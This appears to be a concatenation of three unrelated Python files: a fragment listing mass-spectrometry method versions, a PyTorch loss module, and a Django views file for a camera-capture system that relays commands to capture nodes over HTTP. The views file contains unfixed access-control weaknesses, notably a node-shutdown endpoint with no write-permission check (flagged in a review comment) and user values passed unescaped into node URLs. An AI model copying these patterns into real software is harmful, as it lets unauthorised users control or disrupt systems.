            "feature deconvolution",
            fdc_description,
            {**fdc_params, "compcreate": "76f14c5"},
        ),
        derivation(
            "mass_spec:fdc_0.9.5",
            "feature deconvolution",
            fdc_description,
            {**fdc_params, "compcreate": "7e4f21e"},
        ),
        derivation(
            "mass_spec:fdc_0.9.11",
            "feature deconvolution",
            fdc_description,
            {**fdc_params, "compcreate": "9b94edf"},
        ),
        derivation(
            "mass_spec:fid_0.4.7",
            "feature identification",
            fid_description,
            {**fid_params, "ulsa": "b1fa044"},
        ),
        derivation(
            "mass_spec:fid_0.4.9",
            "feature identification",
            fid_description,
            {**fid_params, "ulsa": "1ede498"},
        ),
        derivation(
            "mass_spec:fid_0.4.5",
            "feature identification",
            fid_description,
            {**fid_params, "ulsa": "7301d29"},
        ),
        derivation(
            "mass_spec:fid_0.5.8",
            "feature identification",
            fid_description,
            {**fid_params, "ulsa": "6cbad51"},
        ),
    ]
    return [MethodsCreate(**m) for m in methods]
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: Donny You(youansheng@gmail.com)
# Loss function for Image Classification.
import torch.nn as nn
from model.pose.loss.mse_loss import MseLoss
# Maps loss-function names to their index in Loss.func_list; the index is
# carried through the 'type' tensor in the network output (see Loss.forward).
BASE_LOSS_DICT = dict(
    mse_loss=0,
)
class Loss(nn.Module):
    """Dispatch and combine weighted loss terms described by the network output.

    The last element of the network's output list is a dict mapping each loss
    name to ``{'type': tensor, 'weight': tensor, 'params': [...]}``. ``type``
    selects an entry of ``func_list`` (see BASE_LOSS_DICT) and ``weight``
    scales that entry's result; the weighted sum is returned under 'loss'.
    """

    def __init__(self, configer):
        super(Loss, self).__init__()
        self.configer = configer
        # Index 0 == mse_loss (BASE_LOSS_DICT).
        self.func_list = [MseLoss(self.configer)]

    def forward(self, out_list):
        loss_dict = out_list[-1]
        out_dict = {}
        weight_dict = {}
        for name, spec in loss_dict.items():
            # The loss-function index travels as a tensor; reduce it to an int.
            func_index = int(spec['type'].float().mean().item())
            out_dict[name] = self.func_list[func_index](*spec['params'])
            weight_dict[name] = spec['weight'].mean().item()
        total = 0.0
        for name in out_dict:
            total += out_dict[name] * weight_dict[name]
        out_dict['loss'] = total
        return out_dict
|
#
# Copyright (c) 2017 Electronic Arts Inc. All Rights Reserved
#
import datetime
import urllib2
import json
import time
import os
import logging
from ava.settings import BASE_DIR
from base64 import b64encode, b64decode
from rest_framework import viewsets
from models import CaptureNode, Camera, CaptureLocation
from serializers import CaptureNodeSerializer, CameraSerializer
from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import IsAuthenticated
from common.views import JSONResponse
from common.uuid_utils import uuid_node_base36
from django.utils import timezone
from django.http import HttpResponse
from django.views.decorators.cache import never_cache
from django.db.models import Count
from rest_framework import permissions
from archive.models import Project as ArchiveProject
from archive.models import Session as ArchiveSession
from archive.models import Shot as ArchiveShot
from archive.models import Take as ArchiveTake
from archive.models import Camera as ArchiveCamera
from jobs.models import FarmJob, FarmNode
from multiprocessing.pool import ThreadPool
# Shared worker pool used to fan out HTTP calls to the capture nodes in parallel.
g_pool = ThreadPool(32)
g_logger = logging.getLogger('dev')
# Timeout (seconds) for most node HTTP calls; slow operations override it inline.
DEFAULT_NODE_HTTP_TIMEOUT = 5
def has_write_access_location_id(request, location_id):
    """Return True when the requesting user has write access to the location."""
    return request.user.access_rights.filter(id=location_id, locationaccess__write_access=True).count()>0
def has_write_access_node(request, node):
    """Return True when the user may modify the given capture node's location."""
    return has_write_access_location_id(request, node.location.id)
def create_session_shot(location_id, session_id, shot_name):
    # When a new take begins, create new entries in the database for the session and shot, if necessary
    changed = False
    loc = CaptureLocation.objects.get(pk=location_id)
    # We are capturing on a specific session
    # NOTE(review): this compares a Session instance against a raw id; it
    # relies on the comparison being False for a different session - confirm.
    if session_id is not None and not loc.cur_session == session_id:
        loc.cur_session = ArchiveSession.objects.get(pk=session_id)
        changed = True
    if (not loc.cur_shot) or (not loc.cur_shot.name == shot_name):
        if not shot_name or shot_name=='-new-': # if shot is unnamed, make up a name from the index
            shot_name = "Shot_%04d"%loc.cur_session.shots.count()
        shot = ArchiveShot(name=shot_name, session=loc.cur_session)
        shot.save()
        loc.cur_shot = shot
        changed = True
    # Only hit the DB when something actually changed.
    if changed:
        loc.save()
def register_new_take(location_id, summary):
    """Persist a completed take (and its cameras' metadata) to the archive.

    Session and Shot should already be created and referenced in cur_session
    and cur_shot (see create_session_shot). Mutates ``summary`` in place with
    project/session/shot/take info and per-camera thumbnail filenames.
    """
    # Record information about this take in the database
    loc = CaptureLocation.objects.get(pk=location_id)
    if loc.cur_project:
        if not loc.cur_session or not loc.cur_shot:
            print 'ERROR> Session and Shot should be created'
            return
        # Create Take
        take = ArchiveTake(name='Take_%04d'%loc.cur_shot.next_take, shot=loc.cur_shot, sequence=loc.cur_shot.next_take)
        take.save()
        # Add cameras to take
        for node in summary['nodes']:
            if 'summary' in node:
                if 'cameras' in node['summary']:
                    # Locate capture node and cameras
                    db_capture_nodes = CaptureNode.objects.filter(location=location_id, machine_name=node['machine_name'])
                    cam_index = 0
                    for cam in node['summary']['cameras']:
                        unique_id = cam['camera']['unique_id']
                        # clash (takeids are not unique across machines)
                        filename = '%08d_%03d_%s_%s.jpg' % (take.id, cam_index, unique_id, uuid_node_base36())
                        filepath = os.path.join(BASE_DIR, 'static', 'thumb', filename)
                        try:
                            # Extra '=' padding tolerates truncated base64 from the node.
                            base64_thumbnail = b64decode(cam['jpeg_thumbnail']+'='*10)
                            with open(filepath, 'wb') as f:
                                f.write(base64_thumbnail)
                        except Exception as e:
                            print e
                        cam['thumb_filename'] = filename
                        all_files = []
                        all_files.extend(cam['recorder']['filenames'])
                        all_files.append(cam['meta']['meta_filename'])
                        # Find associated camera in db
                        db_cam = Camera.objects.filter(node__location=location_id, node__machine_name=node['machine_name'], unique_id=unique_id)[0]
                        camera = ArchiveCamera(
                            take=take,
                            unique_id=unique_id,
                            machine_name=node['machine_name'],
                            model=cam['camera']['model'],
                            version=cam['camera']['version'],
                            using_sync=cam['camera']['using_hardware_sync'],
                            folder=cam['recorder']['filenames'][0],
                            thumbnail_filename=filename,
                            width=cam['camera']['width'],
                            height=cam['camera']['height'],
                            bitdepth=cam['meta']['bitdepth'],
                            frame_count=cam['meta']['frame_count'],
                            dropped_frames=cam['meta']['missing_frames'],
                            total_size=cam['recorder']['total_size'],
                            duration=cam['meta']['duration'],
                            framerate=cam['camera']['framerate'],
                            rotation=db_cam.rotation,
                            all_files=';'.join(all_files)
                        )
                        camera.save()
                        cam_index = cam_index + 1
        # Echo archive identifiers back to the caller through the summary dict.
        summary['project_name'] = loc.cur_project.name
        summary['session_name'] = loc.cur_session.name
        summary['shot_name'] = loc.cur_shot.name
        summary['take_index'] = take.sequence
        summary['take_id'] = take.id
        loc.cur_shot.increment_take()
        loc.save()
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_toggle_using_sync(request):
    """Flip a camera's hardware-sync flag in the DB and push it to its node."""
    if request.method == 'POST':
        j = json.loads(request.body)
        if 'camera_id' in j:
            camera = Camera.objects.get(pk=j['camera_id'])
            if camera:
                if not has_write_access_node(request, camera.node):
                    return HttpResponse(status=403)
                # Toggle in the database first, then mirror the change on the node.
                camera.using_sync = not camera.using_sync
                camera.save()
                url = 'http://%s:8080/toggle_using_sync/%s/%s' % (camera.node.ip_address, camera.unique_id, camera.using_sync)
                try:
                    urllib2.urlopen(url, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
                except Exception as e:
                    # Best-effort: the DB was already updated; a node failure is only logged.
                    g_logger.error('post_toggle_using_sync %s: %s' % (camera.node.machine_name, e))
    return HttpResponse('Ok')
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_close_node(request):
    """Ask a capture node to shut itself down.

    Fix: removed a leftover debug ``print node`` statement.
    """
    # TODO(review): unlike the other mutating endpoints, this one performs no
    # has_write_access_node() check - confirm whether that is intentional.
    if request.method == 'POST':
        j = json.loads(request.body)
        if 'node_id' in j:
            node = CaptureNode.objects.get(pk=j['node_id'])
            if node:
                url = 'http://%s:8080/close_node' % (node.ip_address)
                try:
                    urllib2.urlopen(url, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
                except Exception as e:
                    g_logger.error('%s: %s' % (url, e))
    return HttpResponse('Ok')
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_set_camera_rotation(request):
    """Store a camera's display rotation angle in the database."""
    if request.method == 'POST':
        j = json.loads(request.body)
        if 'camera_id' in j and 'angle' in j:
            cam = Camera.objects.get(pk=j['camera_id'])
            if not has_write_access_node(request, cam.node):
                return HttpResponse(status=403)
            cam.rotation = j['angle']
            cam.save()
    return HttpResponse('Ok')
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_toggle_capturing(request):
    """Toggle live capture for one camera by forwarding the request to its node."""
    if request.method == 'POST':
        j = json.loads(request.body)
        if 'camera_id' in j:
            # NOTE(review): Camera.objects.get raises DoesNotExist rather than
            # returning None, so the 404 branch below may be unreachable - confirm.
            cam = Camera.objects.get(pk=j['camera_id'])
            if cam:
                if not has_write_access_node(request, cam.node):
                    return HttpResponse(status=403)
                url = 'http://%s:8080/toggle_capturing/%s/' % (cam.node.ip_address, cam.unique_id)
                try:
                    urllib2.urlopen(url, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
                except Exception as e:
                    g_logger.error('%s: %s' % (url, e))
                return HttpResponse('Ok')
            return HttpResponse('Camera %d not found' % j['camera_id'], status=404)
    return HttpResponse(status=500)
def parallel_all_prepare_multi1(node):
    """Phase 1 of preparing one node for multi-image recording (run via g_pool)."""
    try:
        # Longer 20s timeout: preparation can be slow on the node side.
        serialized_data = urllib2.urlopen('http://%s:8080/all_prepare_multi1' % node.ip_address, data="", timeout=20).read()
    except Exception as e:
        g_logger.error('parallel_all_prepare_multi1 %s: %s' % (node.machine_name, e))
    # TODO Check result from every node, otherwise, cancel the recording
def parallel_all_prepare_multi2(node):
    """Phase 2 of preparing one node for multi-image recording (run via g_pool)."""
    try:
        serialized_data = urllib2.urlopen('http://%s:8080/all_prepare_multi2' % node.ip_address, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
    except Exception as e:
        g_logger.error('parallel_all_prepare_multi2 %s: %s' % (node.machine_name, e))
    # TODO Check result from every node, otherwise, cancel the recording
def parallel_all_start_multi(node):
    """Start multi-image recording on one node (run via g_pool)."""
    try:
        serialized_data = urllib2.urlopen('http://%s:8080/all_start_multi' % node.ip_address, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
    except Exception as e:
        g_logger.error('parallel_all_start_multi %s: %s' % (node.machine_name, e))
    # TODO Check result from every node, otherwise, cancel the recording
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_start_recording(request):
    """Start a multi-image recording on every online node at a location."""
    if request.method == 'POST':
        j = json.loads(request.body)
        if 'location' in j:
            location_id = j['location']
            if not has_write_access_location_id(request, location_id):
                return HttpResponse(status=403)
            session_id = j['session_id'] if 'session_id' in j else None
            shot_name = j['shot'] if 'shot' in j else None
            # Make sure session/shot rows exist before the take starts.
            create_session_shot(location_id, session_id, shot_name)
            nodes = CaptureNode.objects.filter(location__id=location_id, online=True)
            # Prepare Multi Image Capture (two phases, fanned out in parallel)
            g_pool.map(parallel_all_prepare_multi1, nodes)
            g_pool.map(parallel_all_prepare_multi2, nodes)
            # Start Multi Image Capture
            g_pool.map(parallel_all_start_multi, nodes)
    return HttpResponse('Ok')
def parallel_pause_sync(node):
    """Pause the hardware sync signal on one node (run via g_pool)."""
    try:
        serialized_data = urllib2.urlopen('http://%s:8080/pause_sync' % node.ip_address, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
    except Exception as e:
        g_logger.error('parallel_pause_sync %s: %s' % (node.machine_name, e))
def parallel_resume_sync(node):
    """Resume the hardware sync signal on one node (run via g_pool)."""
    try:
        serialized_data = urllib2.urlopen('http://%s:8080/resume_sync' % node.ip_address, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
    except Exception as e:
        g_logger.error('parallel_resume_sync %s: %s' % (node.machine_name, e))
def parallel_all_stop_recording(p):
    """Stop recording on one node and collect its capture summary (run via g_pool).

    ``p`` is a (node, summary_list) tuple so the callable fits g_pool.map;
    the node's summary dict is appended to the shared list on success.
    """
    node, summary = p
    try:
        serialized_data = urllib2.urlopen('http://%s:8080/all_stop_recording' % node.ip_address, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
        j = json.loads(serialized_data)
        if 'summary' in j:
            node_summary = {}
            node_summary['machine_name'] = node.machine_name
            node_summary['ip_address'] = node.ip_address
            node_summary['summary'] = j['summary']
            summary.append(node_summary)
    except Exception as e:
        g_logger.error('parallel_all_stop_recording %s: %s' % (node.machine_name, e))
def add_rotation_info_to_cameras(summary):
    """Annotate every camera entry in ``summary`` with its rotation from the DB."""
    # Add rotation flag to all cameras (this info is in th DB, and does not come from the nodes)
    for node_summary in summary['nodes']:
        for camera_summary in node_summary['summary']['cameras']:
            try:
                camera_summary['rotation'] = Camera.objects.filter(unique_id=camera_summary['camera']['unique_id'], node__machine_name=node_summary['machine_name'])[0].rotation
            except Exception as e:
                # No matching DB camera: leave 'rotation' unset and just log.
                g_logger.error('Could not get rotation flag : %s' % (e))
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_stop_recording(request):
    """Stop a multi-image recording at a location and archive the new take."""
    if request.method == 'POST':
        j = json.loads(request.body)
        # NOTE(review): requests without 'location' fall through and return
        # None - confirm whether that is intended.
        if 'location' in j:
            location_id = j['location']
            if not has_write_access_location_id(request, location_id):
                return HttpResponse(status=403)
            summary = {}
            summary['result'] = 'OK'
            summary['nodes'] = []
            nodes = CaptureNode.objects.filter(location__id=location_id, online=True)
            # Pause Sync all nodes
            g_pool.map(parallel_pause_sync, nodes)
            # Delay for all cameras to catch up for the last frame being transfered from the camera
            time.sleep(0.5)
            # Stop Recording All Nodes (each appends its summary to summary['nodes'])
            g_pool.map(parallel_all_stop_recording, [(n,summary['nodes']) for n in nodes])
            # Resume sync for preview on all nodes
            g_pool.map(parallel_resume_sync, nodes)
            # Add rotation flag to all cameras (this info is in th DB, and does not come from the nodes)
            add_rotation_info_to_cameras(summary)
            # Store capture in archive
            register_new_take(location_id, summary)
            return JSONResponse(summary)
def parallel_all_prepare_single(node):
    """Prepare one node for a single-image capture (run via g_pool)."""
    try:
        # Longer 30s timeout: preparation can be slow on the node side.
        serialized_data = urllib2.urlopen('http://%s:8080/all_prepare_single' % node.ip_address, data="", timeout=30).read()
    except Exception as e:
        g_logger.error('parallel_all_prepare_single %s: %s' % (node.machine_name, e))
    # TODO Check that we got a result from all computers, otherwise, cancel this recording and set error
    # TODO Send a cancel to all nodes?
def parallel_all_start_single(node):
    """Trigger the single-image capture on one node (run via g_pool)."""
    try:
        serialized_data = urllib2.urlopen('http://%s:8080/all_start_single' % node.ip_address, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
    except Exception as e:
        g_logger.error('parallel_all_start_single %s: %s' % (node.machine_name, e))
    # TODO If we did not get a reply from all computers, continue, but mark this recording as bad
def parallel_all_finalize_single(p):
    """Finalize a single-image capture on one node and collect its summary.

    ``p`` is a (node, summary_list) tuple so the callable fits g_pool.map.
    """
    node, summary = p
    try:
        # Longer 20s timeout: finalization includes file writing on the node.
        serialized_data = urllib2.urlopen('http://%s:8080/all_finalize_single' % node.ip_address, data="", timeout=20).read()
        j = json.loads(serialized_data)
        if 'summary' in j:
            node_summary = {}
            node_summary['machine_name'] = node.machine_name
            node_summary['ip_address'] = node.ip_address
            node_summary['summary'] = j['summary']
            summary.append(node_summary)
    except Exception as e:
        g_logger.error('parallel_all_finalize_single %s: %s' % (node.machine_name, e))
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_record_single_image(request):
    """Capture a single still image on every online node at a location."""
    if request.method == 'POST':
        j = json.loads(request.body)
        if 'location' in j:
            location_id = j['location']
            if not has_write_access_location_id(request, location_id):
                return HttpResponse(status=403)
            nodes = CaptureNode.objects.filter(location__id=location_id, online=True)
            session_id = j['session_id'] if 'session_id' in j else None
            shot_name = j['shot'] if 'shot' in j else None
            # Make sure session/shot rows exist before the take starts.
            create_session_shot(location_id, session_id, shot_name)
            summary = {}
            summary['result'] = 'OK'
            summary['nodes'] = []
            # Prepare Single Image Capture
            g_pool.map(parallel_all_prepare_single, nodes)
            g_pool.map(parallel_all_prepare_multi2, nodes)
            # Start Single Image Capture
            g_pool.map(parallel_all_start_single, nodes)
            # Finalize Single Image Capture (each node appends to summary['nodes'])
            g_pool.map(parallel_all_finalize_single, [(n,summary['nodes']) for n in nodes])
            # Add rotation flag to all cameras (this info is in th DB, and does not come from the nodes)
            add_rotation_info_to_cameras(summary)
            # Store capture in archive
            register_new_take(location_id, summary)
            return JSONResponse(summary)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_new_session(request, location_id="0"):
    """Create a new archive session at a location, deduplicating its name."""
    if request.method == 'POST':
        location_id = int(location_id)
        # Create new session at this location
        # NOTE(review): `g` appears to be a queryset of locations the user can
        # write to; g[0] is updated below - confirm it matches `loc`.
        g = request.user.access_rights.filter(id=location_id, locationaccess__write_access=True)
        if not g:
            return HttpResponse(status=403)
        loc = CaptureLocation.objects.get(pk=location_id)
        if not loc:
            return HttpResponse(status=404)
        j = json.loads(request.body)
        if not 'name' in j:
            return HttpResponse(status=500)
        session_name = j['name']
        # Is the session name unique? If not, append an increasing suffix.
        i = 0
        while ArchiveSession.objects.filter(name=session_name, project=loc.cur_project).count()>0:
            session_name = '%s_%03d' % (j['name'], i)
            i = i + 1
        # Create New Session
        session = ArchiveSession(name=session_name, project=loc.cur_project)
        session.save()
        # Make the new session current and clear the current shot.
        g[0].cur_session = session
        g[0].cur_shot = None
        g[0].save()
        result = {}
        result['session_name'] = session.name
        result['session_id'] = session.id
        return JSONResponse(result)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_set_roi(request, camera_id="0"):
    """Set the region of interest (ROI) of a camera.

    Forwards the raw request body to the camera's capture node. Requires
    write access to the camera's location (403 otherwise). Node errors are
    logged but the view still returns 200 (best effort).
    """
    if request.method == 'POST':
        camera_id = int(camera_id)
        camera = Camera.objects.get(pk=camera_id)
        location_id = camera.node.location.id
        write_access = request.user.access_rights.filter(id=location_id, locationaccess__write_access=True).count()>0
        if not write_access:
            return HttpResponse(status=403)
        # TODO Send request to node
        # TODO Update ROI in DB for camera
        try:
            # Fix: removed leftover debug statement (`print 'test'`) that was
            # left in this production code path.
            result = urllib2.urlopen('http://%s:8080/camera/%s/%s' % (camera.node.ip_address, camera.unique_id, 'roi'), data=request.body, timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
        except Exception as e:
            g_logger.error('post_set_roi %s: %s' % (camera.node.machine_name, e))
        return HttpResponse(status=200)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_reset_roi(request, camera_id="0"):
    """Reset the region of interest (ROI) of a camera.

    Sends an empty body to the node's ROI endpoint (empty body = reset, in
    contrast to post_set_roi which forwards the request body). Requires
    write access to the camera's location (403 otherwise). Node errors are
    logged but the view still returns 200 (best effort).
    """
    if request.method == 'POST':
        camera_id = int(camera_id)
        camera = Camera.objects.get(pk=camera_id)
        location_id = camera.node.location.id
        write_access = request.user.access_rights.filter(id=location_id, locationaccess__write_access=True).count()>0
        if not write_access:
            return HttpResponse(status=403)
        # TODO Send request to node
        # TODO Update ROI in DB for camera
        try:
            result = urllib2.urlopen('http://%s:8080/camera/%s/%s' % (camera.node.ip_address, camera.unique_id, 'roi'), data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
        except Exception as e:
            # Fix: log message previously said 'post_set_roi' (copy-paste
            # bug), which mis-attributed failures to the wrong endpoint.
            g_logger.error('post_reset_roi %s: %s' % (camera.node.machine_name, e))
        return HttpResponse(status=200)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_new_shot(request, location_id="0"):
    """Clear the current shot at a location so the next capture starts a new one.

    Returns 200 on success, 403 if the user has no write access to the
    location.
    """
    if request.method == 'POST':
        # Guard clause: reject users without write access to this location.
        access = request.user.access_rights.filter(
            id=int(location_id), locationaccess__write_access=True)
        if not access:
            return HttpResponse(status=403)
        location = access[0]
        location.cur_shot = None
        location.save()
        return HttpResponse(status=200)
@api_view(['GET', 'POST'])
@permission_classes((IsAuthenticated,))
def camera_parameter(request, location_id="0"):
    """Set one camera parameter and forward it to the camera's capture node.

    POST body: {'cam_id': ..., 'parameter_name': ..., 'value': ...}.
    Exposure, lens aperture and gain are also persisted in the database.

    NOTE(review): the view is declared for GET but has no GET branch, and
    the node-error path falls through without a response (both return None)
    — confirm intended behavior.
    """
    location_id = int(location_id)
    if request.method == 'POST':
        location_id = int(location_id)
        g = request.user.access_rights.filter(id=location_id, locationaccess__write_access=True)
        if not g:
            return HttpResponse(status=403)
        j = json.loads(request.body)
        camera = Camera.objects.get(pk=j['cam_id'])
        # NOTE(review): .get() raises DoesNotExist rather than returning
        # None, so this 404 branch can never trigger.
        if not camera:
            return HttpResponse(status=404)
        # Some parameters are saved in the DB
        # TODO Generalize DB for parameters
        if j['parameter_name'] == 'exposure':
            camera.exposure = j['value']
            camera.save()
        if j['parameter_name'] == 'lens_aperture_value':
            camera.lens_aperture = j['value']
            camera.save()
        if j['parameter_name'] == 'gain':
            camera.gain = j['value']
            camera.save()
        # Update Node with new value
        try:
            result = urllib2.urlopen('http://%s:8080/camera/%s/%s/%s' % (camera.node.ip_address, camera.unique_id, j['parameter_name'], j['value']), data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
            return JSONResponse(result)
        except Exception as e:
            g_logger.error('camera_parameter %s: %s' % (camera.node.machine_name, e))
def apply_options_on_node(p):
    """Push location options (raw request body) to one capture node.

    :param p: tuple ``(node, body, msgs)`` — ``body`` is forwarded verbatim
        to the node's /options/ endpoint, ``msgs`` is a shared list that
        collects a human-readable success/failure line per node.

    Designed for use with a thread-pool ``map``; errors are logged and
    reported via ``msgs`` rather than raised.
    """
    node, body, msgs = p
    try:
        serialized_data = urllib2.urlopen('http://%s:8080/options/' % (node.ip_address), data=body, timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
        msgs.append('Options set on %s\n' % node.ip_address)
    except Exception as e:
        msgs.append('Error setting option on %s\n' % node.ip_address)
        g_logger.error('location_config %s: %s' % (node.machine_name, e))
@api_view(['GET', 'POST'])
@permission_classes((IsAuthenticated,))
def location_config(request, location_id="0"):
    """Read (GET) or update (POST) capture settings for a location.

    GET returns sync frequency, pulse duration and external-sync flag;
    readable-by-all locations are tried first, then per-user access rights.
    POST stores any provided options in the database and pushes the raw
    request body to every online node at the location in parallel.
    """
    location_id = int(location_id)
    if request.method == 'GET':
        loc = CaptureLocation.objects.filter(id=location_id, read_access_all=True) # Try with locations readable by all
        if not loc:
            loc = request.user.access_rights.filter(id=location_id, locationaccess__read_access=True) # Filter by access rights
        if loc:
            result = {}
            result['hardware_sync_frequency'] = loc[0].hardware_sync_frequency
            result['pulse_duration'] = loc[0].pulse_duration
            result['external_sync'] = loc[0].external_sync
            return JSONResponse(result)
        return HttpResponse(status=403)
    if request.method == 'POST':
        msgs = []
        location_id = int(location_id)
        g = request.user.access_rights.filter(id=location_id, locationaccess__write_access=True)
        if g:
            j = json.loads(request.body)
            # Store location options in DB (only keys present in the body
            # are updated; everything else keeps its current value)
            if 'pulse_duration' in j:
                g[0].pulse_duration = int(j['pulse_duration'])
            if 'frequency' in j:
                g[0].hardware_sync_frequency = int(j['frequency'])
            if 'external_sync' in j:
                g[0].external_sync = bool(j['external_sync'])
            if 'display_focus_peak' in j:
                g[0].display_focus_peak = bool(j['display_focus_peak'])
            if 'display_overexposed' in j:
                g[0].display_overexposed = bool(j['display_overexposed'])
            if 'display_histogram' in j:
                g[0].display_histogram = bool(j['display_histogram'])
            if 'bitdepth_avi' in j:
                g[0].bitdepth_avi = int(j['bitdepth_avi'])
            if 'bitdepth_single' in j:
                g[0].bitdepth_single = int(j['bitdepth_single'])
            # set options on all nodes (workers append to the shared msgs)
            nodes = CaptureNode.objects.filter(online=True, location__id=location_id)
            g_pool.map(apply_options_on_node, [(n, request.body, msgs) for n in nodes])
            g[0].save()
            return HttpResponse('Ok ' + ' '.join(msgs))
        # NOTE(review): a POST without write access falls through and
        # returns None — confirm whether a 403 was intended here.
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def get_locations(request):
    """List all capture locations with active-camera counts and access flags.

    Adds a pseudo-location 'Unknown' (id 0) for cameras whose node has no
    assigned location, plus global render-farm statistics. A node counts as
    active if it was seen within the last 90 seconds.
    """
    # Use this opportunity to update any timed-out location
    CaptureNode.objects.filter(online=True, last_seen__lt=timezone.now() - datetime.timedelta(seconds=90)).update(online=False)
    result = {}
    result['locations'] = []
    for loc in CaptureLocation.objects.all():
        read_access = loc.read_access_all or loc.users.filter(id=request.user.id, locationaccess__read_access=True).count()>0
        result['locations'].append({
            'name':loc.name,
            'id':loc.id,
            # Number of cameras on online nodes seen in the last 90 seconds.
            'active':Camera.objects.filter(node__online=True, node__last_seen__gt=timezone.now() - datetime.timedelta(seconds=90), node__location=loc.id).count(),
            'access':read_access})
    # Cameras on nodes with no location are grouped under 'Unknown' (id 0).
    unknown_count = Camera.objects.filter(node__online=True, node__last_seen__gt=timezone.now() - datetime.timedelta(seconds=90), node__location__isnull=True).count()
    if unknown_count>0:
        result['locations'].append({
            'name':'Unknown',
            'id':0,
            'active':unknown_count,
            'access':True})
    # Add extra statistics about the whole system
    result['nb_running_jobs'] = FarmJob.objects.filter(status='running').count()
    result['nb_queued_jobs'] = FarmJob.objects.filter(status='ready').count()
    result['nb_farmnodes_active'] = FarmNode.objects.filter(status='accepting').filter(last_seen__gt=timezone.now() - datetime.timedelta(seconds=90)).count()
    return JSONResponse(result)
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def location(request, location_id="0"):
    """Return the display name of a capture location.

    :param location_id: URL parameter, the location's primary key.
    Returns 404 for id 0 or an unknown id.
    """
    location_id = int(location_id)
    if not location_id:
        return HttpResponse(status=404)
    # Fix: Model.objects.get() raises DoesNotExist instead of returning
    # None, so the original `if loc` check could never fail and an unknown
    # id produced a server error. filter().first() returns None so the
    # intended 404 path is reachable.
    loc = CaptureLocation.objects.filter(pk=location_id).first()
    if loc:
        return HttpResponse(loc.name)
    return HttpResponse(status=404)
def fetch_camera_details_from_node(n):
    """Populate ``n['camera_details']`` with live camera data from the node.

    :param n: serialized capture-node dict (must contain 'ip_address');
        mutated in place. On error the dict is left unchanged and the error
        is logged, so one unreachable node does not break a listing.
    """
    try:
        # Fetch additional data directly from capture node
        serialized_data = urllib2.urlopen('http://%s:8080/cameras' % n['ip_address'], timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
        n['camera_details'] = json.loads(serialized_data)
    except Exception as e:
        g_logger.error('fetch_camera_details_from_node %s: %s' % (n['ip_address'], e))
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def cameras_detailed(request, location_id="0"):
    """Return the full capture-dashboard state for a location.

    Includes access flags, current project/session/shot, the location's
    display options, and the serialized nodes enriched (in parallel) with
    live camera details fetched from each node. Creates a default project
    for the location on first use.
    """
    # Get details from all cameras, including details obtained from the node itself (includes small thumbnail)
    location_id = int(location_id)
    # Check permission for this location_id
    read_access = True
    write_access = False
    if not location_id:
        return HttpResponse(status=500)
    loc = CaptureLocation.objects.get(pk=location_id)
    read_access = loc.read_access_all or request.user.access_rights.filter(id=location_id, locationaccess__read_access=True).count()>0
    if not read_access:
        return HttpResponse(status=403)
    write_access = request.user.access_rights.filter(id=location_id, locationaccess__write_access=True).count()>0
    # filter nodes by location; only nodes seen within the last 90 seconds
    if location_id>0:
        nodes = CaptureNode.objects.filter(location=location_id, online=True, last_seen__gt=timezone.now() - datetime.timedelta(seconds=90)).order_by('machine_name')
    else:
        nodes = CaptureNode.objects.filter(location__isnull=True, online=True, last_seen__gt=timezone.now() - datetime.timedelta(seconds=90)).order_by('machine_name')
    serializer = CaptureNodeSerializer(nodes, many=True, context={'request':request})
    nodes = serializer.data
    result = {}
    # Add location information
    result['read_access'] = read_access
    result['write_access'] = write_access
    if not loc.cur_project:
        # Create default project for this location
        prj = ArchiveProject(name='Default_'+loc.name)
        prj.save()
        loc.cur_project = prj
        loc.save()
    if loc.cur_project:
        result['project_id'] = loc.cur_project.id
        result['project_name'] = loc.cur_project.name
    if loc.cur_session:
        result['session_id'] = loc.cur_session.id
        result['session_name'] = loc.cur_session.name
    else:
        result['session_id'] = None
        result['session_name'] = "-new-"
    if loc.cur_shot:
        result['shot_id'] = loc.cur_shot.id
        result['shot_name'] = loc.cur_shot.name
        result['next_take'] = loc.cur_shot.next_take
    else:
        result['shot_id'] = None
        result['shot_name'] = "-new-"
        result['next_take'] = 1
    # Display options of the location, forwarded to the UI.
    result['location'] = {}
    result['location']['show_focus_peak'] = loc.display_focus_peak
    result['location']['show_overexposed'] = loc.display_overexposed
    result['location']['show_histogram'] = loc.display_histogram
    result['location']['bitdepth_avi'] = loc.bitdepth_avi
    result['location']['bitdepth_single'] = loc.bitdepth_single
    result['location']['hardware_sync_frequency'] = loc.hardware_sync_frequency
    result['location']['pulse_duration'] = loc.pulse_duration
    result['location']['external_sync'] = loc.external_sync
    result['nodes'] = nodes
    # Fetch data from each node in parallel
    g_pool.map(fetch_camera_details_from_node, nodes)
    # Find corresponding database id for each camera
    for node in nodes:
        if 'camera_details' in node:
            # get map of database id vs unique_id from the CaptureNodeSerializer
            cam_id_map = {}
            for x in node['cameras']:
                cam_id_map[x['unique_id']] = x
